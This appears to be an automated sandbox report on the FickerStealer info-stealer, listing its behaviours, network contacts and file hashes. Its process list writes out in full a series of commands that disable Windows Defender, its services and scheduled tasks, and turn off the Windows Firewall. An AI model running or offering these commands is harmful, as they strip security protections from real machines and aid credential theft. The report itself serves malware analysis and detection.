Analysis Overview
SHA256
90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14
Threat Level: Known bad
The file FickerStealer.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Modifies security service
Osiris
Modifies Windows Defender Real-time Protection settings
Executes dropped EXE
Modifies Windows Firewall
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
JavaScript code in executable
Checks installed software on the system
Uses Tor communications
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Suspicious use of SetThreadContext
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-01-28 10:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-01-28 10:48
Reported
2021-01-28 10:50
Platform
win7v20201028
Max time kernel
66s
Max time network
52s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Osiris
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834708978.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
JavaScript code in executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Uses Tor communications
Enumerates physical storage devices
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1044 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe
"C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.147.252:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | mobilesuit.top | udp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 194.109.206.212:80 | tcp | |
| N/A | 131.188.40.189:80 | 131.188.40.189 | tcp |
| N/A | 128.31.0.34:9131 | 128.31.0.34 | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.225.66.103:443 | api.ipify.org | tcp |
| N/A | 128.31.0.34:9131 | 128.31.0.34 | tcp |
| N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp |
| N/A | 88.115.22.244:80 | 88.115.22.244 | tcp |
| N/A | 135.181.41.38:443 | tcp | |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 128.39.8.29:80 | 128.39.8.29 | tcp |
| N/A | 185.233.186.146:80 | 185.233.186.146 | tcp |
| N/A | 185.112.144.20:80 | 185.112.144.20 | tcp |
| N/A | 160.119.249.223:80 | 160.119.249.223 | tcp |
| N/A | 185.191.124.151:443 | 185.191.124.151 | tcp |
| N/A | 45.154.255.75:80 | 45.154.255.75 | tcp |
| N/A | 104.218.63.75:443 | tcp | |
| N/A | 199.249.230.83:80 | 199.249.230.83 | tcp |
| N/A | 50.7.74.173:80 | 50.7.74.173 | tcp |
| N/A | 127.0.0.1:32767 | tcp |
Files
memory/1044-2-0x0000000003730000-0x0000000003741000-memory.dmp
memory/2016-3-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2016-4-0x0000000000401480-mapping.dmp
memory/2016-5-0x00000000760A1000-0x00000000760A3000-memory.dmp
memory/1580-6-0x000007FEF77C0000-0x000007FEF7A3A000-memory.dmp
memory/2016-8-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1044-7-0x0000000000220000-0x0000000000265000-memory.dmp
\Users\Admin\AppData\Local\Temp\1611834708978.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
memory/1484-10-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/908-14-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/1484-17-0x0000000003110000-0x0000000003121000-memory.dmp
memory/616-19-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
memory/552-21-0x0000000000000000-mapping.dmp
memory/1672-22-0x0000000000000000-mapping.dmp
memory/1672-23-0x000007FEFB851000-0x000007FEFB853000-memory.dmp
memory/1484-24-0x0000000000230000-0x0000000000248000-memory.dmp
memory/1484-26-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1672-25-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1672-27-0x0000000002590000-0x0000000002591000-memory.dmp
memory/1672-28-0x000000001AC70000-0x000000001AC71000-memory.dmp
memory/1672-29-0x0000000002480000-0x0000000002482000-memory.dmp
memory/1672-30-0x0000000002484000-0x0000000002486000-memory.dmp
memory/1672-31-0x00000000025D0000-0x00000000025D1000-memory.dmp
memory/1672-32-0x0000000002460000-0x0000000002461000-memory.dmp
memory/908-33-0x0000000000200000-0x000000000027B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/2024-37-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/2024-38-0x0000000000400000-0x000000000045A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/908-42-0x0000000002F00000-0x0000000003080000-memory.dmp
memory/2024-43-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/2024-44-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2024-45-0x00000000002D0000-0x0000000000379000-memory.dmp
\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
| MD5 | b4cd27f2b37665f51eb9fe685ec1d373 |
| SHA1 | 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0 |
| SHA256 | 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581 |
| SHA512 | e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e |
memory/2040-47-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
| MD5 | b4cd27f2b37665f51eb9fe685ec1d373 |
| SHA1 | 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0 |
| SHA256 | 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581 |
| SHA512 | e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e |
memory/1672-49-0x00000000028C0000-0x00000000028C1000-memory.dmp
memory/1672-52-0x000000001AA90000-0x000000001AA91000-memory.dmp
memory/1672-64-0x0000000002A00000-0x0000000002A01000-memory.dmp
memory/1672-65-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
memory/1824-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1824-69-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1824-70-0x00000000024C0000-0x00000000024C1000-memory.dmp
memory/1824-71-0x000000001AD70000-0x000000001AD71000-memory.dmp
memory/1824-72-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
memory/1824-73-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
memory/1824-74-0x0000000002390000-0x0000000002391000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
| MD5 | 8e02df4b54e4444e9812ead4fabe7a28 |
| SHA1 | a7715b3098c2fa02adaced93a613963c39bb1d5d |
| SHA256 | d52167b633008ec6311264c9e0c0bc93c91640e503d37b695db4177e4e1bcd2b |
| SHA512 | 2b4c0d7f3e3457ec90a3e1a87e3e6747f9b26692875b587485f012d411d5865b10d4a4265d5285e46bf38bc1a236b7a0fc73fe1273982e864022c8b4840b2fe6 |
memory/1824-76-0x00000000022F0000-0x00000000022F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 17e62f51abf300be64442e8b3eb154d2 |
| SHA1 | 1304c56fc2290b390ac985a2fccda2f3568c0096 |
| SHA256 | 7c9e9ec28891fe09144ea647f3dff138bd58ba42599a8207ec29fdc7859d841d |
| SHA512 | 55f77bf80b6f282bc2da30e1f77ca637b1af05c9b80ed0e8f1b619a090e985eccddd82b9307ab0452cedfb472423597ccb9f10646b2878a460fd68abfafc3674 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7c0d5e51-802d-4619-9520-75f40ede6115
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67fed384-9742-42bd-ab48-0dab5caef93b
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a7ab1e4-4080-418b-8531-9b5c85c91200
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd37edfd-ee25-4ff2-aabe-5183884f66b1
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d373cec-bf72-49d9-a5bc-ac438d27a74f
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cda1b658-b784-4cfa-8068-23e0209d9883
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e48dddf-4be9-404a-8382-f00ce9fa2701
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
memory/1964-85-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1964-88-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1964-92-0x000000001AC30000-0x000000001AC32000-memory.dmp
memory/1964-93-0x000000001AC34000-0x000000001AC36000-memory.dmp
memory/568-95-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/568-98-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/568-100-0x000000001AB00000-0x000000001AB02000-memory.dmp
memory/568-102-0x000000001AB04000-0x000000001AB06000-memory.dmp
memory/588-105-0x0000000000000000-mapping.dmp
